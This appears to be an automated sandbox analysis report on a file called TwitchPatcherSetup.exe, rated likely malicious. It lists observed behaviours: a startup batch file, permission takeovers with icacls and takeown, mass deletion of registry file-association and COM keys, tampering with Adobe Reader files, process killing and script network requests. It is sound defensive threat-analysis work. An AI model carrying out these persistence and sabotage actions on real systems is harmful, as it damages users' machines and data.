Analysis Overview
SHA256
df9336b06d2a84b387a5d597d5d1ac01b81523c059cf535b53b1d43bfcedf5d7
Threat Level: Likely malicious
The file TwitchPatcherSetup.exe was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Modifies file permissions
Modifies system executable filetype association
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Modifies system certificate store
Delays execution with timeout.exe
Kills process with taskkill
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Uses Volume Shadow Copy WMI provider
Runs net.exe
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 19:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win7-20240708-en
Max time kernel
82s
Max time network
141s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~2.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ENDED_~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~2.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SH~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMPRO~1.CER | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\END_RE~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~2.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGSES~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\LICENS~1.HTM | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\STANDA~1.PDF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MYRIAD~1.OTF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SUBMIS~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.SIG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE78D9~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSIG~1.PDF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\STOP_C~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\CREATE~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RECDE7~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ADD_RE~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~4.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE99D5~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPU~1.INI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\DISTRI~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~2.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~3.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~2.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CCME_B~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEU~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\OPEN_O~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~3.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DEFAUL~1.PDF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEL~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORM_R~1.GIF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.gif\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.jnlp | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.psd1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{367E582C-F71C-4BF9-AA1B-9F62B793E9C5} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.pmc\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F056-0000-0000-C000-000000000046} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73A4C9C1-D68D-11D0-98BF-00A0C90DC8D9} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C7DFFDF1-BD1F-450A-B98D-96B6D30BA4C1} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.website | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.bsc | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.vss | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\removeproperties\DropTarget | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.aps\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F045-0000-0000-C000-000000000046} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1EB89D6-0A9C-4575-A0AE-654A990A454C} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBC} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.hdp\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Query.1\shell\Preview\ddeexec | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\AcroIEHelperShim.DLL | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{435fdba0-964c-43a7-8aff-cc94e21b2249} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEDB-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBA} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B5C71A93-FA82-4672-8B6A-E2C0FF64FF9D}\Programmable | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.mpg\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A03CD5F0-3045-11CF-8C44-00AA006B6814}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBB} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\PropertySheetHandlers\{7EFA68C6-086B-43e1-A2D2-55A113531240} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8075737C-5146-11D5-A672-00B0D022E945} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.i | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Query.1\shell\print\ddeexec | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.mk | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.mv\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E945-E47C-11CD-8701-00AA003F0F07}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Function.1\shell\Open\ddeexec\application | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000507-0000-0010-8000-00AA006D2EA4}\ProgID | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000535-0000-0010-8000-00AA006D2EA4}\VersionIndependentProgID | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.dib\OpenWithProgids | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.mdt\Access.WizardDataFile.14 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.dic\PersistentHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.pst\Outlook.File.pst.14 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.Report.1\shell\Browse\ddeexec | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.msg\Outlook.File.msg.14\ShellNew | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Access.Shortcut.StoredProcedure.1\shell\Design | C:\Windows\system32\reg.exe | N/A |
